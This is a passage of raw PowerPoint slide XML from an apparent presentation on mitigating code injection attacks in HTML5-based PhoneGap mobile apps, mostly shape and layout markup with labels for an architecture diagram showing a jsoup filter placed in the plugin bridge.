            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2776937" cy="417958"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92F6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8" name="Shape 448"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20400" y="15948"/>
              <a:ext cx="2736136" cy="3860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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr sz="2100">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2100"/>
                <a:t>Accuracy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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Case Study (The most powerful ones)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="452" name="image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6602" y="1385887"/>
            <a:ext cx="5910794" cy="3556226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Shape 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2371031"/>
            <a:ext cx="1733551" cy="861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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Selected 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>apps (most powerful ones)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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507023" y="2291006"/>
            <a:ext cx="8616462" cy="85725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2" defTabSz="694944">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="28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rPr>
              <a:t>Mitigation of Code Injection Attacks on HTML5-based Mobile App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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="511" name="Group 511"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1093410" y="1449103"/>
            <a:ext cx="6360093" cy="3474730"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="6360092" cy="3474728"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="460" name="Group 460"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-2" y="-1"/>
              <a:ext cx="6360093" cy="3474730"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6360092" cy="3474728"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="458" name="Shape 458"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="6360093" cy="3474730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59" name="Shape 459"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="6360093" cy="2844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4275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:lvl1pPr algn="ctr">
                  <a:defRPr b="1">
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="1800" b="0"/>
                </a:pPr>
                <a:r>
                  <a:rPr sz="1400" b="1"/>
                  <a:t>PhoneGap App</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="492" name="Group 492"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2629627" y="306456"/>
              <a:ext cx="3480452" cy="2906098"/>
              <a:chOff x="-2" y="-1"/>
              <a:chExt cx="3480451" cy="2906097"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="463" name="Group 463"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-3" y="-2"/>
                <a:ext cx="3480453" cy="2906098"/>
                <a:chOff x="0" y="-1"/>
                <a:chExt cx="3480451" cy="2906097"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="461" name="Shape 461"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-1" y="0"/>
                  <a:ext cx="3480452" cy="2906097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ctr"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62" name="Shape 462"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-1" y="-2"/>
                  <a:ext cx="3480452" cy="50035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34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="1400" b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:rPr>
                    <a:t>PhoneGap</a:t>
                  </a:r>
                  <a:endParaRPr b="1">
                    <a:latin typeface="Merriweather"/>
                    <a:ea typeface="Merriweather"/>
                    <a:cs typeface="Merriweather"/>
                    <a:sym typeface="Merriweather"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr lvl="0" algn="ctr">
                    <a:defRPr sz="1800"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="1400" b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:rPr>
                    <a:t>Framework (Java)</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="476" name="Group 476"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2080261" y="610031"/>
                <a:ext cx="1174448" cy="2117429"/>
                <a:chOff x="-1" y="-2"/>
                <a:chExt cx="1174447" cy="2117427"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="466" name="Group 466"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="-2" y="-3"/>
                  <a:ext cx="1174448" cy="2117429"/>
                  <a:chOff x="-1" y="-1"/>
                  <a:chExt cx="1174447" cy="2117427"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="464" name="Shape 464"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="-1"/>
                    <a:ext cx="1174448" cy="2117427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8EC2F2"/>
                      </a:gs>
                      <a:gs pos="43000">
                        <a:srgbClr val="BBDEFF"/>
                      </a:gs>
                      <a:gs pos="93000">
                        <a:srgbClr val="EBF5FE"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="F9FCFE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125092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lvl="0" algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="465" name="Shape 465"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="-2"/>
                    <a:ext cx="1174448" cy="50035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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:rPr>
                      <a:t>Plugins</a:t>
                    </a:r>
                    <a:endParaRPr b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:rPr>
                      <a:t>(Java)</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="469" name="Group 469"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="165367" y="589755"/>
                  <a:ext cx="843711" cy="300048"/>
                  <a:chOff x="0" y="0"/>
                  <a:chExt cx="843709" cy="300047"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="467" name="Shape 467"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-1" y="0"/>
                    <a:ext cx="843710" cy="3000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F6FC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 algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="468" name="Shape 468"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="14646" y="7792"/>
                    <a:ext cx="814416" cy="28445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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle>
                    <a:lvl1pPr algn="ctr">
                      <a:defRPr b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:defRPr>
                    </a:lvl1pPr>
                  </a:lstStyle>
                  <a:p>
                    <a:pPr lvl="0">
                      <a:defRPr sz="1800" b="0"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1"/>
                      <a:t>Camera</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="472" name="Group 472"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="179596" y="1048350"/>
                  <a:ext cx="815258" cy="300049"/>
                  <a:chOff x="0" y="0"/>
                  <a:chExt cx="815256" cy="300047"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="470" name="Shape 470"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="815257" cy="3000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F6FC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 algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="471" name="Shape 471"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="14647" y="7792"/>
                    <a:ext cx="785962" cy="28445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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle>
                    <a:lvl1pPr algn="ctr">
                      <a:defRPr b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:defRPr>
                    </a:lvl1pPr>
                  </a:lstStyle>
                  <a:p>
                    <a:pPr lvl="0">
                      <a:defRPr sz="1800" b="0"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1"/>
                      <a:t>Contact</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="475" name="Group 475"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="179596" y="1559489"/>
                  <a:ext cx="815258" cy="300048"/>
                  <a:chOff x="0" y="-1"/>
                  <a:chExt cx="815256" cy="300046"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="473" name="Shape 473"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="0" y="-2"/>
                    <a:ext cx="815257" cy="3000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F6FC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 algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="474" name="Shape 474"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="14647" y="7792"/>
                    <a:ext cx="785962" cy="28445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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle>
                    <a:lvl1pPr algn="ctr">
                      <a:defRPr b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:defRPr>
                    </a:lvl1pPr>
                  </a:lstStyle>
                  <a:p>
                    <a:pPr lvl="0">
                      <a:defRPr sz="1800" b="0"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1"/>
                      <a:t>SMS</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="490" name="Group 490"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="205736" y="599672"/>
                <a:ext cx="1508778" cy="2200646"/>
                <a:chOff x="-2" y="-2"/>
                <a:chExt cx="1508776" cy="2200644"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="479" name="Group 479"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="-3" y="-2"/>
                  <a:ext cx="1508777" cy="2117430"/>
                  <a:chOff x="-1" y="-1"/>
                  <a:chExt cx="1508776" cy="2117429"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="477" name="Shape 477"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="0"/>
                    <a:ext cx="1508777" cy="2117429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8EC2F2"/>
                      </a:gs>
                      <a:gs pos="43000">
                        <a:srgbClr val="BBDEFF"/>
                      </a:gs>
                      <a:gs pos="93000">
                        <a:srgbClr val="EBF5FE"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="F9FCFE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125092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lvl="0" algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="478" name="Shape 478"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="-2"/>
                    <a:ext cx="1508777" cy="28445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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle>
                    <a:lvl1pPr algn="ctr">
                      <a:defRPr b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:defRPr>
                    </a:lvl1pPr>
                  </a:lstStyle>
                  <a:p>
                    <a:pPr lvl="0">
                      <a:defRPr sz="1800" b="0"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1"/>
                      <a:t>Bridge</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="482" name="Group 482"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="267454" y="298606"/>
                  <a:ext cx="943050" cy="978711"/>
                  <a:chOff x="-1" y="-1"/>
                  <a:chExt cx="943049" cy="978709"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="480" name="Shape 480"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-1" y="-1"/>
                    <a:ext cx="943050" cy="97871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3600" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="21600" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="21600" y="18131"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="21600" y="20047"/>
                          <a:pt x="19988" y="21600"/>
                          <a:pt x="18000" y="21600"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="0" y="21600"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3469"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="1553"/>
                          <a:pt x="1612" y="0"/>
                          <a:pt x="360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86DAFC"/>
                      </a:gs>
                      <a:gs pos="43000">
                        <a:srgbClr val="BBEBFF"/>
                      </a:gs>
                      <a:gs pos="93000">
                        <a:srgbClr val="EBF9FF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="F9FDFE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1F73A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lvl="0" algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="481" name="Shape 481"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="46037" y="46035"/>
                    <a:ext cx="850974" cy="50035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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:rPr>
                      <a:t>Plugin</a:t>
                    </a:r>
                    <a:endParaRPr b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:rPr>
                      <a:t>Manager</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="485" name="Group 485"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="353596" y="753476"/>
                  <a:ext cx="771535" cy="500351"/>
                  <a:chOff x="-1" y="0"/>
                  <a:chExt cx="771534" cy="500349"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="483" name="Shape 483"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="34480"/>
                    <a:ext cx="771535" cy="431404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C4EEB6"/>
                      </a:gs>
                      <a:gs pos="43000">
                        <a:srgbClr val="DDF9D3"/>
                      </a:gs>
                      <a:gs pos="93000">
                        <a:srgbClr val="F5FDF1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FBFFFB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5A9545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 algn="ctr">
                      <a:defRPr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/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="484" name="Shape 484"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="-1"/>
                    <a:ext cx="771535" cy="50035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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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rPr>
                      <a:t>Filter</a:t>
                    </a:r>
                    <a:endParaRPr b="1">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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rPr>
                      <a:t>(jsoup)</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="488" name="Group 488"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="219759" y="1461348"/>
                  <a:ext cx="1038437" cy="739295"/>
                  <a:chOff x="-1" y="-1"/>
                  <a:chExt cx="1038435" cy="739294"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="486" name="Shape 486"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="-2" y="-1"/>
                    <a:ext cx="1038437" cy="47203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636" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="21600" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="21600" y="18000"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="21600" y="19988"/>
                          <a:pt x="20867" y="21600"/>
                          <a:pt x="19964" y="21600"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="0" y="21600"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3600"/>
                        </a:lnTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="1612"/>
                          <a:pt x="733" y="0"/>
                          <a:pt x="1636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86DAFC"/>
                      </a:gs>
                      <a:gs pos="43000">
                        <a:srgbClr val="BBEBFF"/>
                      </a:gs>
                      <a:gs pos="93000">
                        <a:srgbClr val="EBF9FF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="F9FDFE"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="circle">
                      <a:fillToRect l="37721" t="-19636" r="62278" b="119636"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="9525" cap="flat">
                    <a:solidFill>
                      <a:srgbClr val="1F73A0"/>
                    </a:solidFill>
                    <a:prstDash val="solid"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lvl="0" algn="ctr">
                      <a:defRPr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endParaRPr/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="487" name="Shape 487"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="23042" y="23043"/>
                    <a:ext cx="992351" cy="71625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square" lIns="34275" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="t">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:rPr>
                      <a:t>JSMessage</a:t>
                    </a:r>
                    <a:endParaRPr b="1">
                      <a:latin typeface="Merriweather"/>
                      <a:ea typeface="Merriweather"/>
                      <a:cs typeface="Merriweather"/>
                      <a:sym typeface="Merriweather"/>
                    </a:endParaRPr>
                  </a:p>
                  <a:p>
                    <a:pPr lvl="0" algn="ctr">
                      <a:defRPr sz="1800"/>
                    </a:pPr>
                    <a:r>
                      <a:rPr sz="1400" b="1">
                        <a:latin typeface="Merriweather"/>
                        <a:ea typeface="Merriweather"/>
                        <a:cs typeface="Merriweather"/>
                        <a:sym typeface="Merriweather"/>
                      </a:rPr>
                      <a:t>Queue</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="489" name="Shape 489"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="738976" y="1219250"/>
                  <a:ext cx="5" cy="242104"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="34925" cap="flat">
                  <a:solidFill>
